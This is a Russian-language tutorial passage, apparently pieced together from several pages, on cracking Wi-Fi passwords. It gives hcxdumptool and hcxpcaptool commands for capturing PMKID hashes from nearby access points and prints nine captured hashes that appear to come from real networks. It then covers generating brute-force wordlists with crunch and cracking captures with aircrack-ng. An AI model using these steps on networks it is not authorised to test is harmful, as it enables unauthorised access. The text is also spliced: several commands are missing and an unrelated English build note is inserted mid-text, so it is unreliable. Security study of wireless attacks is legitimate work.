Если вы хотите атаковать конкретную точку доступа и вы знаете номер канала, на котором она работает, то кроме опций —filterlist_ap (в которой укажите один адрес) и опции —filtermode=2, можно указать опцию -c, после которой напишите номер канала ТД.

Если ТД получает наш пакет с запросом ассоциации и поддерживает отправку PMKID, то мы увидим сообщением [FOUND PMKID]. То есть если появляются надписи [FOUND PMKID], значит мы успешно получили PMKID для точки доступа.

Дополнительно время от времени внизу появляются обобщающие данные, в том числе содержащие строку powned, например, powned=6:

Это означает, что захвачены данные для шести (в моём случае) точек доступа. Это необязательно именно PMKID — здесь учитываются и обычные рукопожатия (если атака деаутентификация не была предварительно отключена).

В зависимости от шумности wifi канала, может потребоваться некоторое время для получения PMKID. Авторы рекомендуют запускать hcxdumptool до 10 минут. Сбор данных может работать любое время, обычно 10 минут более чем достаточно. Для остановки захвата просто нажмите Ctrl c.

Теперь запустим hcxpcaptool для конвертации захваченных данных из формата pcapng в хеш формат, который принимает hashcat:

hcxpcaptool -z test.16800 test.pcapng

Здесь:

• test.pcapng — имя файла, из которого извлекаются данные
• опция -z означает сохранить PMKID, за ней идёт имя файла, куда будет сделано сохранение.

Данные с подробностями:

start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.10-arch1-1-ARCH
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 2974
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 51
probe requests...............: 18
probe responses..............: 24
association requests.........: 74
association responses........: 161
reassociation requests.......: 3
reassociation responses......: 43
authentications (OPEN SYSTEM): 2262
authentications (BROADCOM)...: 2244
authentications (APPLE)......: 17
EAPOL packets................: 336
EAPOL PMKIDs.................: 9
9 PMKID(s) written to test.16800

Всего сохранено 9 PMKID в файл test.16800.

Файл с хешами — это самый обычный текстовый файл, его можно открыть любым текстовым редактором и посмотреть:

gedit test.16800

Содержимое моего файла:

f2d89d22949759168edf5fd0324764a7*cc4eece1ad58*008092b75244*4e50414145
b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245
a695c4e6a51c1590ea06a458a1860a24*403dec1a88a8*a8880854af50*52756e6763686169
8a8e906b2fb33e0c66833e5efeb4dc8e*403dec187630*7429afe41473*747275655f686f6d6532475f343432
bba899c7bd8719487377dd38a83a2648*403decc272b8*bc926b7c4e2c*5061616e676f6f6e5f3247
5a2da74a1dbe085331dcd9af61a87f50*c88d833bea34*18e29fec7be3*57494e5645524e
e33c525441bf7588c53966addb685a4c*98ded0be2346*fcc2333f478f*546f6e323534386661323535306b616932353133
67661236088d31c937a4646ede4aa7bb*403decbeb114*fcc2333f478f*747275655f686f6d6532475f313036
1bdb53c369ca8c470d9cc990440f056f*2c088c5a4862*60a4d0044de7*426f6f63687532

Кажется, что ничего не понятно? На самом деле, всё довольно просто. Самой интересной частью хеша для нас является та строка, которая идёт после последней звёздочки. В ней содержится имя Точки Доступа в шестнадцатеричном виде. Чтобы перевести это имя в нормальный вид, используйте команду вида:

Программы для атаки без клиентов в blackarch

hcxdumptool и hcxtools в этом дистрибутиве присутствуют в репозитории, поэтому устанавливаются одной командой:

sudo pacman -S hcxdumptool hcxtools

О том, как установить Hashcat в Arch Linux/BlackArch написано здесь.

Программы для атаки без клиентов в kali linux

Для данной атаки необходимы три программы:

hcxdumptool и hcxtools в Kali Linux устанавливаются совсем просто:

Словари для aircrack – составьте сами.

Чуть ниже на той же странице авторов aircrack приводится и список адресов программ, которые помогут составить словари для aircrack самому. Насколько это результативно? Взгляните сами.

Буду краток. Воспользуемся имеющей в составе кали утилитой Crunh . Создана для генерирования случайных паролей, имеет ряд полезных настроек. Некоторые из них очень полезны, если вы, к примеру, ухитрились увидеть часть пароля жертвы. То есть часть символов вам известна.

Процесс генерации прост. Запустите терминал и введите команду в формате:crunch 7 8 -o /root/Desktop/dictКоманда создаст словарь с названием dict на Рабочем столе из всевозможных буквенно-символьно-цифровых комбинаций, содержащий от 7 до 8 символов – обычный пароль. Удобно, да? И никакие словари для aircrack скачивать не надо… Рано радуетесь – присмотритесь к размеру:

Да-да, совсем немного – около 2-х Терабайт. Пичалька (…

Что делать? Можно добавить команды конкретизировать пароли, если у вас есть на это основания. Так, команда генерации может принять вид:crunch 7 8 9876543210 -o /root/Desktop/dict.lstгде 9876543210 – именно и только встречающиеся в будущем словаре символы. И никаких больше. Или:

В этом случае Crunch создаст словарь с паролями #$.

Таких словарей может быть составлено много, поверьте, иногда этот способ очень даже срабатывает. Весить они будут не так много, они будут мобильны, их легко хранить на внешних носителях. Так, в команде подбора паролей потом можно будет указать созданные вами пароли через запятую (если самодельные словари для aircrack хранятся на рабочем столе кали):aircrack-ng /root/имя-файла.cap -w /root/Desktop/dict1,dict2,dict3

Installing required and optional dependencies

Below are instructions for installing the basic requirements to build
aircrack-ng for a number of operating systems.

Note: CMocka, tcpdump, screen, HostAPd and WPA Supplicant should not be dependencies when packaging Aircrack-ng.

Заключение

https://www.youtube.com/watch?v=hfdhqjkCLck

Возможно, показанные методы являются не самыми оптимальными, особенно на этапе захвата PMKID с помощью airodump-ng, когда нам нужно вручную подключаться к Точке Доступа с другой Wi-Fi карты, но пока ничего лучшего я не придумал. Если вы знаете другой, более простой способ спровоцировать отправку запроса ассоциации, то напишите его здесь в комментариях.